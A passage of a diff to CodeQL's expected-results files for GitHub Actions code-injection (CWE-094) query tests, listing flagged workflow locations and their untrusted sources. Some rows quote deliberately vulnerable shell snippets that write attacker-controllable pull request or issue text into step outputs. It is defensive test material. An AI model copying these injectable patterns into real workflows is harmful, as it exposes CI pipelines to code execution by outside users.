+| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref index 6fc87669b07f..9af8ec0f9ab1 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-094/CodeInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-094/CodeInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index fc6f8aa58209..4bbe7da0aaf3 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -1,62 +1,3 @@ -#select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:77:15:77:36 | inputs.spelling | ${{ inputs.spelling }} | -| .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:214:41:214:69 | inputs.github_username | ${{ inputs.github_username }} | -| .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:215:41:215:66 | inputs.github_email | ${{ inputs.github_email }} | -| .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action7/action.yml:217:25:217:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | -| .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | -| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job5.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | 